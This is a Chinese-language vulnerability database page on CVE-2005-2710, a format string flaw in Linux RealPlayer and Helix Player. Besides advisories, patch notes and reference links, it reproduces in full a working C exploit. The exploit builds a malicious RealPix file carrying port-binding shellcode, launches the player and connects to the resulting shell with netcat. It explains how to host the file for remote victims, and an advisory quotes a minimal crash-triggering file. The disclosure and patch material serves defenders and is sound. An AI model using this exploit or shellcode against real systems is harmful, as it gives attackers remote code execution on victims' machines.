CVE-2005-2710
CVSS5.1
发布时间 :2005-09-27 16:03:00
修订时间 :2016-10-17 23:29:36
NMCOEPS    

[原文]Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.


[CNNVD]RealNetworks RealPlayer和Helix Player格式串处理漏洞(CNNVD-200509-260)

        RealPlayer和Helix Player都是非常流行的媒体播放器,支持多种媒体格式。
        RealPlayer和Helix Player中存在格式串漏洞,远程攻击者可能利用此漏洞控制机器。起因是没有正确的验证用户输入。远程攻击者可以利用这个漏洞直接向格式化打印函数提供格式说明符,导致执行任意代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:realnetworks:helix_player
cpe:/a:realnetworks:realplayer:10.0RealNetworks RealPlayer 10.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11015Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2710
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2710
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-260
(官方数据源) CNNVD

- 其它链接及资源

http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078
(VENDOR_ADVISORY)  CONFIRM  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078
http://marc.info/?l=bugtraq&m=112785544325326&w=2
(UNKNOWN)  BUGTRAQ  20050926 RealPlayer && HelixPlayer Remote Format String Exploit
http://marc.info/?l=full-disclosure&m=112775929608219&w=2
(UNKNOWN)  FULLDISC  20050926 RealPlayer && HelixPlayer Remote Format String
http://securityreason.com/securityalert/27
(UNKNOWN)  SREASON  27
http://securityreason.com/securityalert/41
(UNKNOWN)  SREASON  41
http://www.debian.org/security/2005/dsa-826
(VENDOR_ADVISORY)  DEBIAN  DSA-826
http://www.gentoo.org/security/en/glsa/glsa-200510-07.xml
(UNKNOWN)  GENTOO  GLSA-200510-07
http://www.idefense.com/application/poi/display?id=311&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050930 RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
http://www.kb.cert.org/vuls/id/361181
(VENDOR_ADVISORY)  CERT-VN  VU#361181
http://www.novell.com/linux/security/advisories/2005_59_RealPlayer.html
(UNKNOWN)  SUSE  SUSE-SA:2005:059
http://www.open-security.org/advisories/13
(VENDOR_ADVISORY)  MISC  http://www.open-security.org/advisories/13
http://www.redhat.com/support/errata/RHSA-2005-762.html
(UNKNOWN)  REDHAT  RHSA-2005:762
http://www.redhat.com/support/errata/RHSA-2005-788.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:788

- 漏洞信息

RealNetworks RealPlayer和Helix Player格式串处理漏洞
中危 格式化字符串
2005-09-27 00:00:00 2006-01-05 00:00:00
远程  
        RealPlayer和Helix Player都是非常流行的媒体播放器,支持多种媒体格式。
        RealPlayer和Helix Player中存在格式串漏洞,远程攻击者可能利用此漏洞控制机器。起因是没有正确的验证用户输入。远程攻击者可以利用这个漏洞直接向格式化打印函数提供格式说明符,导致执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1232)

RealPlayer/Helix Player Remote Format String Exploit (linux) (EDBID:1232)
linux remote
2005-09-26 Verified
0 c0ntex
N/A [点击下载]
/*
  *****************************************************************************************************************
  $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: September 26th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************

  UNIX RealPlayer && Helix Player
  http://real.com
  http://helixcommunity.org

  "The Helix Player is the Helix Community's open source media player for consumers. It is being developed
  to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis,
  Theora etc. 
  The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several
  non-open source components including RealAudio/RealVideo, MP3 etc."

  There is a remotly exploitable format string vulnerability in the latest Helix Media Player suit that will
  allow an attacker the possibility to execute malicious code on a victims computer. The exploit code will
  execute a remote shell under the permissions of the user running the media player, and effects all versions
  of RealPlayer and Helix Player.

  The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) file formats. Although
  others may be effected I stick to realpix file format for this advisory.

  Almost all media file input is placed on the heap, so it's not possible to just pop our way to a supplied
  string like with a normal stack based format bug, as such we can't directly modify GOT, DTORS, etc. leaving
  us limited to what we can do.

  There are several places where we can control the flow of execution:

       popN - call *0x04(eax) - eax is controlled
       popN+N - call *0x20(eax) - eax is controlled
       popN+NN - call *0x100(edx) - edx is controlled
       popN+NNN - ebp - ebp is controlled
       popN+NNNN - eip - eip is controlled
       ....

  however since we are limited to the size of the value that can be written, it doesn't seem possible to
  point at a known good location directly. Since our shellcode is always mapped via the .rp file between
  0x0822**** - 0x082f**** and with control of one pointer at a time usually, we can not reach the LSB, we
  are toast.

  In a phrack paper, Riq talks about using sections of the base pointer to create a 4 byte pointer by
  chaining EBP like so:

  [Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP]

  And can be manipulated something like so:

  --------     --------     --------
  Frame 10     Frame 11     Frame 12
  --------     --------     --------
                1|------------\/
  [LSBMSB]     [LSBMSB]--   [41414141]
      2|____________^  3|__________^ 

  Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing at 0x00000000.

  So what else can I do?

  How about use the fact the file being played is under my control and only the MSB needs overwritten. This
  solves the problem with the size of the valaue I can write. It is possible to modify the MSB of an EBP
  that is reachable, eventually leading to EIP pointing at some good location after "mov %ebp,%esp" happens,
  resulting in the execution of our shellcode.

	1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp
	2-> Overwrite EBP MSB with the address of the file location on the stack
	3-> EBP is moved to ESP
	4-> EIP is changed to ESP value
	5-> EIP is owned, shell is spawned

  Granted this is not a stable method as the user can freely manipulate their environment, and we use the
  file name, which is stored in an environment variable to trampoline us to the shellcode. However my goal
  here is not to create a worm but a proof-of-concept  :p 

  The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in /usr/local/RealPlayer
  and run as shown below.

  Sample local run:

  Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold

  Window 1:
  ---------
  c0ntex@debauch:~$ netstat -an --ip
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
  tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
  tcp        0      0 192.168.88.133:22       192.168.88.1:2080       ESTABLISHED
  udp        0      0 0.0.0.0:68              0.0.0.0:*
  c0ntex@debauch:~$ ./helix4real

  Remote format string exploit POC for UNIX RealPlayer && HelixPlayer
  Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version
  by c0ntex || c0ntexb@gmail.com || http://www.open-security.org

  [-] Creating file [VY~Ò.rp]
  [-] Using [148] stack pops
  [-] Modifying EBP MSB with value [64105]
  [-] Completed creation of test file!
  [-] Executing RealPlayer now...
  [-] Connecting to shell in 10 seconds
  ** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW ** 

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

  (realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

  ps -ef | tail -12;
  ...
  c0ntex    1631  1624  0 01:10 pts/2    00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp
  c0ntex    1636  1631  4 01:10 pts/2    00:00:02 /bin//sh
  c0ntex    1637  1636  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1638  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1639  1636  0 01:10 pts/2    00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
  c0ntex    1640  1636  0 01:10 pts/2    00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
  c0ntex    1641  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1642  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  c0ntex    1643  1637  0 01:10 pts/2    00:00:00           ?   ²úÿ¿f   ? ?\    ?   ?       .rp
  ...

  To exploit this remotly, a user just needs to place the created file on a web site and provide a link so
  users can click the file, launching RealPlayer and exploiting the vulnerability.

  Real have been duely informed about this issue and are fixing. Sadly though, it seems someone is trying to
  pinch my research, as such I have been forced to release this advisory sooner than hoped. Until Real get
  a new release out, do not play untrusted media with RealPlayer or HelixPlayer. Sorry Real.com!

  Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers.

  PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ http://www.open-security.org/adv.xml
  is now available.

 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER          10000
#define EBPMSB          64105
#define HOST            "localhost"
#define NETCAT          "/bin/nc"
#define NOPS            0x90
#define STACKPOP        148
#define VULN            "/usr/local/RealPlayer/realplay"

char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
                "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
                "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
                "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
                "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
                "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
                "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
                "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
                "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                "\xe1\xcd\x80";


int
filegen(char *shellcode)
{
     FILE *rp;

     printf("[-] Creating file [%s]\n", filename);

     rp = fopen(filename, "w");
     if(!rp) {
           puts("[!] Could not fopen file!");
           free(shellcode);
           return(EXIT_FAILURE);
     }

     printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);

     fprintf(rp,
                     "<imfl>\n"
                     "<head\n"
                     "duration=\"1:33.7\"\n"
                     "timeformat=\"dd:hh:mm:ss.xyz\"\n"
                     "preroll=\"1:33.7\"\n"
                     "bitrate=\"1337\"\n"
                     "width=\"69\"\n"
                     "height=\"69\"\n"
                     "aspect=\"\"\n"
                     "url=\"http://www.open-security.org\"/>\n"
                     "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
                     "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
                     "</imfl>", EBPMSB, STACKPOP, shellcode);
      fclose(rp);

      free(shellcode); shellcode = NULL;

      return(EXIT_SUCCESS);
}


int
main(int argc, char **argv)
{
     char *shellcode = NULL;

     puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
     puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
     puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

     shellcode = (char *)malloc(BUFFER);
     if(!shellcode) {
           puts("[!] Could not malloc");
           return(EXIT_FAILURE);
     }

     memset(shellcode, NOPS, BUFFER);
     memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
     shellcode[BUFFER] = '\0';

     filegen(shellcode);

     puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

     switch(fork()) {
            case -1:
                    puts("[!] Could not fork off, bailing!");
                    return(EXIT_FAILURE);
            case 0:
                    if(execl(VULN, "realplay", filename, NULL) <0) {
                            puts("[!] Could not execute realplayer... :(");
                            return(EXIT_FAILURE);
                    }
     }

     puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
     sleep(10);

     if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
            puts("[!] Could not connect, check the core file!");
            return(EXIT_FAILURE);
     }

     return(EXIT_SUCCESS);
}

// milw0rm.com [2005-09-26]
		

- 漏洞信息 (F40503)

Gentoo Linux Security Advisory 200510-7 (PacketStormID:F40503)
2005-10-08 00:00:00
Gentoo  security.gentoo.org
advisory,overflow
linux,gentoo
CVE-2005-2710
[点击下载]

Gentoo Linux Security Advisory GLSA 200510-07 - c0ntex reported that RealPlayer and Helix Player suffer from a heap overflow. Versions less than 10.0.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: RealPlayer, Helix Player: Format string vulnerability
      Date: October 07, 2005
      Bugs: #107309
        ID: 200510-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

RealPlayer and Helix Player are vulnerable to a format string
vulnerability resulting in the execution of arbitrary code.

Background
==========

RealPlayer is a multimedia player capable of handling multiple
multimedia file formats. Helix Player is an open source media player
for Linux.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /              Unaffected
    -------------------------------------------------------------------
  1  media-video/realplayer       < 10.0.6                   >= 10.0.6
  2  media-video/helixplayer       < 1.0.6                    >= 1.0.6
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

"c0ntex" reported that RealPlayer and Helix Player suffer from a heap
overflow.

Impact
======

By enticing a user to play a specially crafted realpix (.rp) or
realtext (.rt) file, an attacker could execute arbitrary code with the
permissions of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All RealPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.6"

All Helix Player users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/helixplayer-1.0.6"

References
==========

  [ 1 ] CAN-2005-2710
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2710

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

    

- 漏洞信息 (F40433)

iDEFENSE Security Advisory 2005-09-30.t (PacketStormID:F40433)
2005-10-06 00:00:00
iDefense Labs  idefense.com
advisory,remote,arbitrary
linux
CVE-2005-2710
[点击下载]

iDEFENSE Security Advisory 09.30.05 - Remote exploitation of a format string vulnerability in RealPix (.rp) file format parser within various versions of RealNetworks Inc.'s RealPlayer could allow attackers to execute arbitrary code. The vendor has indicated that the following versions are vulnerable: Linux RealPlayer 10 (10.0.0 - 10.0.5), Helix Player (10.0.0 - 10.0.5).

RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability 

iDEFENSE Security Advisory 09.30.05
www.idefense.com/application/poi/display?id=311&type=vulnerabilities
September 30, 2005

I. BACKGROUND

RealPlayer is an application for playing various media formats,
developed by RealNetworks Inc. For more information, visit
http://www.real.com/.

II. DESCRIPTION

Remote exploitation of a format string vulnerability in RealPix (.rp) 
file format parser within various versions of RealNetworks Inc.'s 
RealPlayer could allow attackers to execute arbitrary code. 

The vulnerability specifically exists because of the improper usage of a

formatted printing function. When a user specifies an invalid value for 
the "timeformat" attribute describing a RealPix file, the data is passed

to the function. 

The following stripped down .rp file is sufficient enough to trigger the

vulnerability: 

   <imfl>
   <head 
   title="iDEFENSE Labs RealPix Vulnerability"
   timeformat="%n%n%n%n%n%n"/>
   </imfl> 


III. ANALYSIS

Exploitation allows for arbitrary code execution as the user who opened
the .rp file.

Exploitation requires an attacker to craft a malicious .rp file and
convince a user to open it. An attacker could also trick a user to load 
the .rp file from a normal web page under the attacker's control; this 
is possible if the user has configured their web browser to handle 
RealPlayer formats automatically.

IV. DETECTION

iDEFENSE Labs has confirmed that RealPlayer 10.0.4.750 on Linux is 
vulnerable. Windows and Mac versions of RealPlayer are not vulnerable. 
FreeBSD versions are suspected vulnerable.

The vendor has indicated that the following versions are vulnerable:
   Linux RealPlayer 10 (10.0.0 - 10.0.5)
   Helix Player (10.0.0 - 10.0.5)

The following vendors include susceptible RealPlayer packages within
their respective distributions:

	The FreeBSD Project: FreeBSD 5.3 and earlier
	Novell Inc.: SuSE Linux 9.2 
	Red Hat Inc.: Desktop v.3 and v.4,
	   Enterprise Linux AS/ES/WS v.3 and v.4 and Fedora Core 3,
	   Linux 7.3 and 9 

V. WORKAROUND

Filter .rp attachments at e-mail gateways. Educate users about the risks

of accepting files from untrusted individuals.

VI. VENDOR RESPONSE

The vendor had released the following advisory for this vulnerability:

   http://service.real.com/help/faq/security/050930_player/EN/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2710 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/23/2005  Initial vendor notification
09/02/2005  Initial vendor response
09/30/2005  Coordinated public disclosure

IX. CREDIT

iDEFENSE Labs is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息 (F40361)

Debian Linux Security Advisory 826-1 (PacketStormID:F40361)
2005-10-04 00:00:00
Debian  security.debian.org
advisory,vulnerability
linux,debian
CVE-2005-1766,CVE-2005-2710
[点击下载]

Debian Security Advisory DSA 826-1 - Multiple security vulnerabilities have been identified in the helix-player media player that could allow an attacker to execute code on the victim's machine via specially crafted network resources.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 826-1                     security@debian.org
http://www.debian.org/security/                              Michael Stone
September 29th, 2005                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : helix-player
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CAN-2005-1766 CAN-2005-2710
Debian Bug     : 316276 330364

Multiple security vulnerabilities have been identified in the
helix-player media player that could allow an attacker to execute code
on the victim's machine via specially crafted network resources.

CAN-2005-1766

        Buffer overflow in the RealText parser could allow remote code
        execution via a specially crafted RealMedia file with a long
        RealText string.

CAN-2005-2710

        Format string vulnerability in Real HelixPlayer and RealPlayer 10
        allows remote attackers to execute arbitrary code via the image
        handle attribute in a RealPix (.rp) or RealText (.rt) file.

For the stable distribution (sarge), these problems have been fixed in
version 1.0.4-1sarge1

For the unstable distribution (sid), these problems have been fixed in
version 1.0.6-1

We recommend that you upgrade your helix-player package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

helix-player was distributed only on the i386 and powerpc architecures

  Source archives:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1.dsc
      Size/MD5 checksum:      908 6ff062a280bab4db79c04e08278e28d6
    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1.diff.gz
      Size/MD5 checksum:     7788 1e3280253e2d60701b28b153863b2fd0
    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4.orig.tar.gz
      Size/MD5 checksum: 18044552 a277710be35426b317869503a4ad36d7

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1_i386.deb
      Size/MD5 checksum:  4289094 b3d2934818a2139f309f77e4acd50e3d

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/h/helix-player/helix-player_1.0.4-1sarge1_powerpc.deb
      Size/MD5 checksum:  4415404 f771482fd671da4848d6a496df128f69

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iQCVAwUBQzx/AA0hVr09l8FJAQLkTAP+K1+4HF3DWTLnS3QX8Kd595rwXm60KYRj
6eDJtqs+2mhlLXLdsUPZS+wciEA7jirjXk5dGb+wgNAAhKpP5BxfX4jeLV0mgn1l
sWI1917bK1F/IISKdOlwLUG/c7nnCpJ3VBiqAfSAkcu6brUzI3fRMTej3DBCtcx1
h3S88TEoI/A=
=XoVE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

19695
RealPlayer invalid-handle Error Message Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

- 时间线

2005-09-26 Unknow
Unknow 2005-09-27

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, RealNetworks has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RealNetworks RealPlayer And Helix Player Format String Vulnerability
Input Validation Error 14945
Yes No
2005-09-26 12:00:00 2009-07-12 05:06:00
iDEFENSE Labs discovered this vulnerability.

- 受影响的程序版本

S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Enterprise Linux AS 4
Real Networks RealPlayer For Unix 10.0.4
+ Red Hat Enterprise Linux AS 4
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
+ S.u.S.E. Linux Personal 9.3
+ S.u.S.E. Linux Personal 9.2
Real Networks RealPlayer For Unix 10.0.3
+ S.u.S.E. Linux Personal 9.3
+ S.u.S.E. Linux Personal 9.2
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.5
+ Gentoo Linux
Real Networks Helix Player for Linux 1.0.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Red Hat Enterprise Linux AS 4
+ Red Hat Fedora Core3
+ RedHat Desktop 4.0
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
Real Networks Helix Player for Linux 1.0.3
+ Gentoo Linux
+ Red Hat Fedora Core3
Real Networks Helix Player for Linux 1.0.2
+ Red Hat Enterprise Linux AS 4
+ RedHat Enterprise Linux ES 4
+ RedHat Enterprise Linux WS 4
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0

- 漏洞讨论

RealPlayer and Helix player are susceptible to a format string vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input, allowing a remote attacker to supply format specifiers directly to a formatted printing function.

Successful exploitation of this vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application.

RealPlayer 10.0 through 10.0.5 for Linux and Helix Player 1.0 through 1.0.5 are prone to this issue.

- 漏洞利用

An exploit was provided by c0ntex &lt;c0ntexb@gmail.com&gt;:

- 解决方案

RedHat has released advisories RHSA-2005:788-3, FEDORA-2005-940, and FEDORA-2005-941 to address this issue in RedHat Enterprise Linux, and Fedora Core 3 and 4 respectively. Please see the referenced advisories for further information.

Debian has released advisory DSA 826-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released advisory GLSA 200510-07 to address this issue.

Gentoo users may obtain RealPlayer updates by running the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=media-video/realplayer-10.0.6"

Gentoo users may obtain Helix Player updates by running the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=media-video/helixplayer-1.0.6"

SUSE has released advisory SUSE-SA:2005:059 to address this issue in affected products. Please see the referenced advisory for more information.

RealNetworks has released fixes for this issue:


Real Networks RealPlayer 10 for Linux

Real Networks Helix Player for Linux 1.0

Real Networks Helix Player for Linux 1.0.1

Real Networks Helix Player for Linux 1.0.2

Real Networks Helix Player for Linux 1.0.3

Real Networks Helix Player for Linux 1.0.4

Real Networks Helix Player for Linux 1.0.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站